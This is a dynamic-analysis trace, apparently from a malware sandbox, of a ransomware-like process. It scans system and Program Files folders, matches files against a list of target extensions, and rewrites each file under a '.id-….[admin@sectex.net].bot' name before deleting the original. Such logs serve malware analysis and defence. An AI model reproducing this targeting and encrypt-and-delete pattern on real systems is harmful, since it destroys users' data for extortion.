	[0171.388] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.388] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.389] GetLastError () returned 0x0
	[0171.389] ReadFile (in: hFile=0x350, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x650c, lpOverlapped=0x0) returned 1
	[0171.601] WriteFile (in: hFile=0x124, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x6510, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x6510, lpOverlapped=0x0) returned 1
	[0171.602] ReadFile (in: hFile=0x350, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.602] WriteFile (in: hFile=0x124, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.602] SetEndOfFile (hFile=0x124) returned 1
	[0171.603] CloseHandle (hObject=0x124) returned 1
	[0171.603] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.603] SetEndOfFile (hFile=0x350) returned 1
	[0171.607] CloseHandle (hObject=0x350) returned 1
	[0171.608] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.608] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185796.wmf")) returned 1
	[0171.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.609] lstrlenW (lpString=".doc") returned 4
	[0171.609] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.609] lstrlenW (lpString=".docx") returned 5
	[0171.609] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.609] lstrlenW (lpString=".pdf") returned 4
	[0171.609] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.609] lstrlenW (lpString=".xls") returned 4
	[0171.609] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.609] lstrlenW (lpString=".xlsx") returned 5
	[0171.609] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.609] lstrlenW (lpString=".ppt") returned 4
	[0171.609] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.609] lstrlenW (lpString=".zip") returned 4
	[0171.609] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.609] lstrlenW (lpString=".rar") returned 4
	[0171.609] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.609] lstrlenW (lpString=".bz2") returned 4
	[0171.609] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.609] lstrlenW (lpString=".7z") returned 3
	[0171.609] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.609] lstrlenW (lpString=".dbf") returned 4
	[0171.609] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.609] lstrlenW (lpString=".1cd") returned 4
	[0171.609] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.609] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.609] lstrlenW (lpString=".jpg") returned 4
	[0171.609] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.610] lstrlenW (lpString=".doc") returned 4
	[0171.610] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString=".docx") returned 5
	[0171.610] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.610] lstrlenW (lpString=".pdf") returned 4
	[0171.610] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString=".xls") returned 4
	[0171.610] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.610] lstrlenW (lpString=".xlsx") returned 5
	[0171.610] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.610] lstrlenW (lpString=".ppt") returned 4
	[0171.610] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.610] lstrlenW (lpString=".zip") returned 4
	[0171.610] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.610] lstrlenW (lpString=".rar") returned 4
	[0171.610] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString=".bz2") returned 4
	[0171.610] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString=".7z") returned 3
	[0171.610] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.610] lstrlenW (lpString=".dbf") returned 4
	[0171.610] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.610] lstrlenW (lpString=".1cd") returned 4
	[0171.610] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185796.WMF") returned 63
	[0171.610] lstrlenW (lpString=".jpg") returned 4
	[0171.610] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.611] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.611] lstrlenW (lpString="J0187647.WMF") returned 12
	[0171.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187647.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.719] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6596) returned 1
	[0171.719] CloseHandle (hObject=0x118) returned 1
	[0171.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187647.wmf")) 

Thread:
	id = 56
	os_tid = 0x76c

	[0137.418] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9f70058
	[0137.418] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10000) returned 0x9f80060
	[0137.419] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea28
	[0137.419] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x6) returned 0x7bac818
	[0137.419] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea40
	[0137.419] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x100000) returned 0xaf60020
	[0137.419] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea58
	[0137.419] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baea58, Size=0x20) returned 0x7b65bd0
	[0137.419] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7baea58
	[0137.419] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7baea58, Size=0x20) returned 0x7b65ba8
	[0137.419] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0137.419] GetProcAddress (hModule=0x77080000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x770ad650
	[0137.419] Wow64DisableWow64FsRedirection (in: OldValue=0xa40ff58 | out: OldValue=0xa40ff58*=0x0) returned 1
	[0137.419] lstrlenW (lpString="kernel32.dll") returned 12
	[0137.419] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65bd0 | out: hHeap=0x7ab0000) returned 1
	[0137.419] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0137.419] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b65ba8 | out: hHeap=0x7ab0000) returned 1
	[0137.420] Sleep (dwMilliseconds=0x64) 
	[0137.596] lstrcmpiW (lpString1=".LOG", lpString2=".bot") returned 1
	[0137.596] lstrlenW (lpString="BCD.LOG") returned 7
	[0137.596] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0137.601] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.601] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.601] lstrlenW (lpString=".doc") returned 4
	[0137.601] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1
	[0137.601] lstrlenW (lpString=".docx") returned 5
	[0137.601] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1
	[0137.601] lstrlenW (lpString=".pdf") returned 4
	[0137.601] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1
	[0137.601] lstrlenW (lpString=".xls") returned 4
	[0137.601] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1
	[0137.601] lstrlenW (lpString=".xlsx") returned 5
	[0137.601] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1
	[0137.601] lstrlenW (lpString=".ppt") returned 4
	[0137.602] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1
	[0137.602] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.602] lstrlenW (lpString=".zip") returned 4
	[0137.602] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1
	[0137.602] lstrlenW (lpString=".rar") returned 4
	[0137.602] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1
	[0137.602] lstrlenW (lpString=".bz2") returned 4
	[0137.602] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1
	[0137.602] lstrlenW (lpString=".7z") returned 3
	[0137.602] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1
	[0137.602] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.602] lstrlenW (lpString=".dbf") returned 4
	[0137.602] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1
	[0137.602] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.602] lstrlenW (lpString=".1cd") returned 4
	[0137.602] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1
	[0137.602] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.602] lstrlenW (lpString=".jpg") returned 4
	[0137.602] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1
	[0137.602] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.602] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.602] lstrlenW (lpString=".doc") returned 4
	[0137.602] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1
	[0137.602] lstrlenW (lpString=".docx") returned 5
	[0137.602] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1
	[0137.602] lstrlenW (lpString=".pdf") returned 4
	[0137.602] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1
	[0137.602] lstrlenW (lpString=".xls") returned 4
	[0137.602] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1
	[0137.602] lstrlenW (lpString=".xlsx") returned 5
	[0137.602] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1
	[0137.602] lstrlenW (lpString=".ppt") returned 4
	[0137.602] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1
	[0137.603] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.603] lstrlenW (lpString=".zip") returned 4
	[0137.603] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1
	[0137.603] lstrlenW (lpString=".rar") returned 4
	[0137.603] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1
	[0137.603] lstrlenW (lpString=".bz2") returned 4
	[0137.603] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1
	[0137.603] lstrlenW (lpString=".7z") returned 3
	[0137.603] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1
	[0137.603] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.603] lstrlenW (lpString=".dbf") returned 4
	[0137.603] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1
	[0137.603] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.603] lstrlenW (lpString=".1cd") returned 4
	[0137.603] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1
	[0137.603] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15
	[0137.603] lstrlenW (lpString=".jpg") returned 4
	[0137.603] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1
	[0137.603] Sleep (dwMilliseconds=0x64) 
	[0137.825] Sleep (dwMilliseconds=0x64) 
	[0137.995] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0137.995] lstrlenW (lpString="boxed-join.avi") returned 14
	[0137.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.247] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=33280) returned 1
	[0138.247] CloseHandle (hObject=0x2fc) returned 1
	[0138.247] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi")) returned 0x20
	[0138.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-join.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.248] lstrlenW (lpString=".doc") returned 4
	[0138.248] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString=".docx") returned 5
	[0138.248] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0138.248] lstrlenW (lpString=".pdf") returned 4
	[0138.248] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString=".xls") returned 4
	[0138.248] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString=".xlsx") returned 5
	[0138.248] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0138.248] lstrlenW (lpString=".ppt") returned 4
	[0138.248] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.248] lstrlenW (lpString=".zip") returned 4
	[0138.248] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString=".rar") returned 4
	[0138.248] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString=".bz2") returned 4
	[0138.248] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString=".7z") returned 3
	[0138.248] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.248] lstrlenW (lpString=".dbf") returned 4
	[0138.248] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.248] lstrlenW (lpString=".1cd") returned 4
	[0138.249] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.249] lstrlenW (lpString=".jpg") returned 4
	[0138.249] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.249] lstrlenW (lpString=".doc") returned 4
	[0138.249] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString=".docx") returned 5
	[0138.249] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1
	[0138.249] lstrlenW (lpString=".pdf") returned 4
	[0138.249] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString=".xls") returned 4
	[0138.249] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString=".xlsx") returned 5
	[0138.249] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1
	[0138.249] lstrlenW (lpString=".ppt") returned 4
	[0138.249] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.249] lstrlenW (lpString=".zip") returned 4
	[0138.249] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString=".rar") returned 4
	[0138.249] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString=".bz2") returned 4
	[0138.249] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString=".7z") returned 3
	[0138.249] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.249] lstrlenW (lpString=".dbf") returned 4
	[0138.249] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.249] lstrlenW (lpString=".1cd") returned 4
	[0138.249] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71
	[0138.250] lstrlenW (lpString=".jpg") returned 4
	[0138.250] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.250] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0138.250] lstrlenW (lpString="correct.avi") returned 11
	[0138.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc
	[0138.250] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=197120) returned 1
	[0138.250] CloseHandle (hObject=0x2fc) returned 1
	[0138.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20
	[0138.250] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.251] lstrlenW (lpString=".doc") returned 4
	[0138.251] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString=".docx") returned 5
	[0138.251] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.251] lstrlenW (lpString=".pdf") returned 4
	[0138.251] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString=".xls") returned 4
	[0138.251] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString=".xlsx") returned 5
	[0138.251] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.251] lstrlenW (lpString=".ppt") returned 4
	[0138.251] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.251] lstrlenW (lpString=".zip") returned 4
	[0138.251] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString=".rar") returned 4
	[0138.251] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString=".bz2") returned 4
	[0138.251] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString=".7z") returned 3
	[0138.251] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.251] lstrlenW (lpString=".dbf") returned 4
	[0138.251] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.251] lstrlenW (lpString=".1cd") returned 4
	[0138.251] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.251] lstrlenW (lpString=".jpg") returned 4
	[0138.251] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.251] lstrlenW (lpString=".doc") returned 4
	[0138.252] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString=".docx") returned 5
	[0138.252] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1
	[0138.252] lstrlenW (lpString=".pdf") returned 4
	[0138.252] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString=".xls") returned 4
	[0138.252] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString=".xlsx") returned 5
	[0138.252] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1
	[0138.252] lstrlenW (lpString=".ppt") returned 4
	[0138.252] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.252] lstrlenW (lpString=".zip") returned 4
	[0138.252] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString=".rar") returned 4
	[0138.252] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString=".bz2") returned 4
	[0138.252] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString=".7z") returned 3
	[0138.252] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.252] lstrlenW (lpString=".dbf") returned 4
	[0138.252] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.252] lstrlenW (lpString=".1cd") returned 4
	[0138.252] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68
	[0138.252] lstrlenW (lpString=".jpg") returned 4
	[0138.252] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.252] lstrcmpiW (lpString1=".avi", lpString2=".bot") returned -1
	[0138.252] lstrlenW (lpString="delete.avi") returned 10
